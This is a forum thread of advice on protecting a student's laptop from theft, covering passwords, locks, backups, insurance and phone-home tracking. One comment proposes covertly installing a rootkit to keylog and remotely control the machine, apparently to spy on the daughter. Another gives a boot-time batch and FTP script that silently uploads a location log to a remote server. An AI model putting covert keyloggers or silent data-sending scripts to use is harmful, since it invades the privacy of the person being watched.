IMO opinion the "phoning home" idea is not the best solution. You want to prevent theft. The best way to do that is to be careful. To always know where your laptop is and to not carry it to every damn class. Learn to take notes in a paper notepad (huh? Gasp!). Don't lug it around to evening classes. Don't be so careless. Also buying a lock for it when you leave it in the dorm so your room mate's skivvy boyfriend doesn't steal it is a good idea. Best practices is your best solution. Unless what you're really looking for is a way to snoop around your daughter's computer and know where she's going online.

A plug, but what the hell

[ckuske]

The company I work for is working on a product that will run on OS X and WinXP, that will do exactly this.

You can have the software phone home to our servers, or report to your own syslog server.

In a few weeks, check out www.winlocate.com or www.maclocate.com

If you're interested in beta testing, let me know also!

Re:A plug, but what the hell

Look for a new job - your company's product is not innovative.

Re:A plug, but what the hell

[ckuske]

It's not a new idea, sure, but I don't see any references in this article for an actual product.

Instead, everyone is recommending that you hack together your own scripts, which typical Joe User can't/won't do if he can get a reasonably priced product to do it for him.

root kit

Why not use a root kit of some sort. Back orifice is on that I can think of but I think that is one that requires you to know what I.P. you want to attach to. I am sure that there is one that will phone home. It just may take research. Not only will you be able to tell where the machine is, you will be able to log the key stroke, shut the machine down, etc.. If you use it right you my be able to prevent the gandchild as well:)

Re: bios passwd

[mysidia]

Bios password isn't got to stop the theft, it's going to stop the laptop being used afterwards ... until they hard-reset the bios. It might work against you as it might result in the laptop being trashed. If it's used then you at least have a chance to catch the culprit(s).

You can set a BIOS password without making it unusuable by making access mode "setup". A password isn't normally required to use the system, but if they hit "DEL" while booting to try to re-enable the boot-from-CDROM option, they will be at a password prompt.

Setting up a hard drive password means that if the thief tries to reset the BIOS, they will erase the key from the system making it unbootable: the equipment will no longer work once they reset the BIOS.

Assuming they can figure out how, anyways.

There's also this issue of your private information being left on the machine. On the other hand, you may actually have something more valuable on the hard drive than the machine itself, like your intellectual work or private information, which you would not want a thief to be able to extract.

If a thief knows enough about computer equipment to strip a laptop and reset the BIOS, then you're screwed anyways, chances are they know their own 'risk' of phone-home-software, whether a packaged solution or someone's tailor-made FTP-on-boot script.

It's gone

[electronerdz]

If I was going to steal a laptop, I think I'd know well enough not to plug it into the Internet. Face it, if it's stolen, it is probably far gone. The best thing to do is make sure the box is registered with the manufacturer, so that if anyone calls on a BIOS request or service, you can possibly track them that way. I have a BIOS password, and a hard drive password on my laptop. Both the Windows and the Linux have passwords. If my laptop is stolen, I want it to be a useless piece of junk to them. I'd just go myself another one. In my business, it is necessary, and I need one at whatever cost. I can't afford to sit at home waiting for a phone home. Your daughter will probably be the same way. She needs to get papers written and can't wait weeks to find it, then months for the police to do anything about it.

Re: bios passwd

If there's anything a college student is more likely to steal than a laptop, it's going to be pizza.

Maybe a cutaway text book is a better idea?

Any thief is going to format the drive immediately

[gatkinso]

...after all the probably aren't after the data.... and of they are they will be savvy enough to not connect the machine to a network connected to the internet.

Physical Protection+Crypto+Backups

[Sam+Nitzberg]

I'd recommend a cable-together with a lock. Not perfect security, but it helps, especially if / when she takes the notebook anywhere to work on it. All notebooks pretty much support a universal notebook-lock system.

Get a seperate external USB drive (or other device) to copy her files to. Should the machine go missing (and its not kept with the USB drive), she will have her data - this may be worth more to her than the $1000 that "commodity" notebooks are going for ...
She can move data off of the notebook entirely that she's not using. Should the notebook go missing, noone gets here documents. Also, with basic crypto software, this can help protect her documents, photos, papers, etc.

Habit

[PingPongBoy]

When I was in university, a lot of people just left their stuff lying around assuming no one would care to touch what is not theirs. Generally, jail is a deterrent. However, it is quite easy to mistakenly sit down at the wrong seat and gather up something not yours - who would know the difference?

I travel with my computer and I don't want to forget it anywhere so I carry it with me at all times no matter how inconvenient it is. In other words I develop a habit of knowing that my computer has to be with me regardless of what I want to do.

Another tip - don't frequent areas where crime is rampant. Watch for people and keep with those you can trust.

In polar coordinates: r = C

[PingPongBoy]

If you want to discourage theft I reckon the grunge look (ie case mod it to hell, as others suggest) is the only way

Ultra secure and grunge - a ball and chain

More practical approach...

[lythander]

I work at a major East-Coast university in IT security. I have seen students with a wide range of computer-related problems, and while theft can happen if she's careless, your daughter's data is probably more valuable.

Make sure it's running anti-virus and anti-spyware programs, and that they're set to automatically update often (NOT once a week). Install a personal firewall, AND use a hardware firewall (router) in the dorm room. Defense in depth. She'll be out on the campus using wireless or whatever, hence the personal firewall. Hardware is still better, though. Make sure it does egress-filtering, as well (keeps you from spewing bad stuff if you get 0wned). Make sure she pays heed to the info she's given by the university IT people -- they may have additional tools to keep her machine and the campus network safe.

We no longer counsel people to "clean up" infected machines, except in the case of very simple viruses. These are increasingly rare. Everything has a bot in it these days, meaning it is no longer under your control. They're difficult and time-consuming to extract, so we require an FFR -- fdisk, format, reinstall.

To make this easier, see to it that the machine is installed such that Windows sits on it's own partition, with data on another partition. Backup the data often and back up the Windows partition after it's installed and patched, but before you have it on the net. Make sure she has media for everything she could conceiveably need to reinstall -- waiting for openoffice to download again because you got 0wned again isn't good.

Insure the laptop through your homeowners' insurance, or get her renter's insurance. If it's from a vendor who has insurance or an extended warranty, get that. It will fall, get sat on, or maybe get lifted, but don't hobble it so it's useless. Get a club for it (easy security but not effective against the determined), and make it distinctive (stickers, paint -- make it look ugly or obnoxious though, not cool!) Most of all, relax. Your daughter is going off to college. You have so much more to worry about, don't sweat this.

BTW, is she cute?

how I did it

[dj_virto]

After a few thefts at the non profit I was working for, this is how I did it.

Created a text file called log.html that had at the top <html> <body background="red"><font face="verdana" size="3">

When you append to the file, some browsers will still read the HTML even though you'll never close the html and body tags :) Ok, this isn't strictle needed, but it makes the output a little prettier.

Next, I wrote a batch file like this

date /t >log.html
time /t >log.html
tracert www.wired.com >log.html
ftp -s:ftpscript.txt


A tracert is better than the current IP, because it reveals the location even from behind a firewall. It wouldn't help to know your computer was at 192.168.0.1 now would it? :)

the ftpscript.txt file should have a series of ftp commands, one per line like this

open www.yourdomain.com
username
password
put log.html
quit


Set the whole thing to run minimized on bootup and each morning at 5 am.

As someone already pointed out, ideally your machine should be set to autologin so the thiefs (or more likely the pawn shop purchaser :) ) don't just wipe the drive. in XP, try start-run- control userpasswords2

Have phun! -p

Re:how I did it

[bcmm]

date /t >log.html

???
Unless you want to overwrite the log each time, you probably mean:

date /t >>log.html

, and similarly for the other lines.

oh yeah.. locking down the machine

[dj_virto]

By the way, if sticker shock on those brand name wire locking devices is troubling you, another way to do it is to buy a length of vinyl coated steel cord at the hardware store.. get whatever diameter you can find or make a hole for on your computer.. then just loop it around a hole in the furniture and bolt the ends together with a series of u-bolts. Get the right size for your cord- too big and they will actually be looser. Tighten the hell out of them. Sure the potential thief could take the time unbolt them, but it seems unlikely that they would, especially if they are in an awkward spot like under the table. Of course bolt cutters defeat commercial and home made tie-downs.. graduate to steel chain with 2 inch links if this is an issue. :) ..or move somewhere safe like Tasmania.. -p

Parent = Liar

Having been involved with reverse engineering the MSN protocols, when msn starts up it connects to Microsoft servers. All chats are routed through these same servers so people CANNOT find out someone's IP from it. Only *accepted* file transfers create direct connections between the involved computers.

Magic AC